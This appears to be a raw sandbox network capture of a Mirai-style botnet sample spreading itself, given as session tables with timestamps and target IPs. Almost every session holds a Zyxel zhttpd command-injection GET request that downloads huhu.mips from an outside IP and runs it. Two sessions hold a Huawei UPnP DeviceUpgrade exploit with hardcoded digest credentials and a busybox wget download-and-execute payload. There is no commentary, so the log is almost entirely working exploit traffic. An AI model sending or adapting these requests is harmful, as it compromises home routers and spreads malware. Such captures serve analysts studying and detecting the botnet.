                                                        Feb 2, 2024 06:21:24.230488062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8071192.168.2.1442778139.167.112.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.230541945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8072192.168.2.144099294.50.136.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.235573053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8073192.168.2.1450682151.40.89.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.235624075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8074192.168.2.1447104216.29.44.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.235661030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8075192.168.2.144128835.241.30.4337215
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.939500093 CET841OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 472
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 68 75 68 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.180.149.156 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8076192.168.2.144939441.44.244.21237215
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.170841932 CET841OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 472
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 68 75 68 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.180.149.156 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                        Feb 2, 2024 06:21:25.560086012 CET182INHTTP/1.1 500 Internal Server Error
                                                        Content-Type: text/xml; charset="utf-8"
                                                        Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                                        EXT:
                                                        Connection: Keep-Alive
                                                        Content-Length: 398


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8077192.168.2.1454874220.178.244.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.244343996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8078192.168.2.1441568171.110.82.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.244386911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8079192.168.2.145554273.5.221.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.244440079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8080192.168.2.144137090.237.4.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.244478941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8081192.168.2.1439062147.142.71.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.244533062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8082192.168.2.1443800146.55.163.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.244566917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8083192.168.2.143626488.107.246.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.244599104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8084192.168.2.1460978152.58.228.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.244622946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8085192.168.2.145191813.155.141.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.244663000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8086192.168.2.144041044.103.175.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.244713068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8087192.168.2.1453192125.219.144.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.244748116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8088192.168.2.1433012205.160.226.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.244776964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8089192.168.2.1448310130.213.192.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.244829893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8090192.168.2.144502846.163.78.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.244875908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8091192.168.2.1439328115.185.141.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.244913101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8092192.168.2.1445942171.90.53.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.244963884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8093192.168.2.143419484.11.166.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.244998932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8094192.168.2.1433194186.244.175.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.245042086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8095192.168.2.1455928102.109.110.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.245080948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8096192.168.2.1449466162.184.251.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.245117903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8097192.168.2.1445818181.99.14.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.245157003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8098192.168.2.1450542168.38.104.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.245193958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8099192.168.2.145955070.218.26.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.245244026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8100192.168.2.143452234.2.19.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.245291948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8101192.168.2.1432822128.44.29.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.245317936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8102192.168.2.1453850221.67.111.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.245359898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8103192.168.2.1457946115.46.211.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.245392084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8104192.168.2.145757442.216.170.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.245420933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8105192.168.2.1457552216.221.216.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.245481014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8106192.168.2.1448588174.34.5.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.245522976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8107192.168.2.143799024.151.224.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.245570898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8108192.168.2.145887297.74.218.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.245615959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8109192.168.2.145231089.54.187.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.245659113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8110192.168.2.1455618112.166.122.154443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.245698929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8111192.168.2.14355925.182.0.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.245739937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8112192.168.2.143960014.143.195.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.245768070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8113192.168.2.1442590110.137.40.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.245840073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8114192.168.2.1438538166.16.145.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.245876074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8115192.168.2.145237278.191.102.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.245903969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8116192.168.2.1437974190.18.24.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.245929003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8117192.168.2.144411034.174.21.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.245960951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8118192.168.2.144812636.251.237.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.246031046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8119192.168.2.1450580205.161.99.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.246058941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
